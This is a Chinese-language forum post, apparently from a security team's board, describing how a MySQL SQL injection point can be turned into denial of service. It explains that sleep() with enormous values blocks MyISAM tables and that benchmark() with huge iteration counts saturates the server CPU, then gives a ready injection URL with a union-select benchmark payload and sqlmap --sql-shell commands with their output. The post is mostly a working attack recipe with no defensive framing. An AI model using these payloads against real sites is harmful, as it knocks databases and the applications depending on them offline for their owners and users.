切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
281 sqlmap DOS[复制链接]
发表于 2012-10-7 20:25:00 | 显示全部楼层 |!read_mode!
mysql存在注入,并且注入的sleep语句如果传入一个足够大的参数,比如:sleep(9999999999).
如果数据库用的是myisam引擎,且注入点是某个会锁表的语句(insert,replace,update,delete),那么整个数据表的访问都会被阻塞。
使用该表的所有应用的读库请求都会被阻塞。
一个例子 当我执行:
  1. root@ubuntu:~# mysql -u root -p
  2. Enter password:
  3. Welcome to the MySQL monitor.  Commands end with ; or \g.
  4. Your MySQL connection id is 34
  5. Server version: 5.1.61-0ubuntu0.10.10.1-log (Ubuntu)

  6. Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

  7. Oracle is a registered trademark of Oracle Corporation and/or its
  8. affiliates. Other names may be trademarks of their respective
  9. owners.

  10. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

  11. mysql> select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f);
复制代码
SERVER的CPU瞬间%99


注入的原理就是操作数据库  一个注入点就能DOS
例如:http://5.5.5.8/pen/news.php?id=1%20union%20select%201,benchmark%2899999999,md5%280×41%29%29


SQLMAP操作:
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --sql-shell
  2. sql-shell> select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
  3. [21:19:49] [INFO] fetching SQL SELECT statement query output: 'select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)'
  4. [21:19:49] [WARNING] reflective value(s) found and filtering out
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:23

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部